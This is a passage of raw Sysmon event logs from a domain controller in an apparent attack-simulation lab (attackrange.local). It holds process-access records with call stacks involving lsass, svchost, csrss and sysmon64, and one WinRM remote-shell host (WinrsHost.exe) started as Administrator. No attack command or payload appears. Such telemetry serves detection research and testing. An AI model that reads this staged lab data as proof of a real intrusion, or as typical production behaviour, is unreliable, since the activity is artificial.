2\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.294{266CAFBE-62DD-6064-1400-00000000AD01}13401036C:\Windows\system32\svchost.exe{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.279{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.263{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.263{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-D602-00000000AD01}1296C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.259{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.247{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.060{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.060{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.060{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.029{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 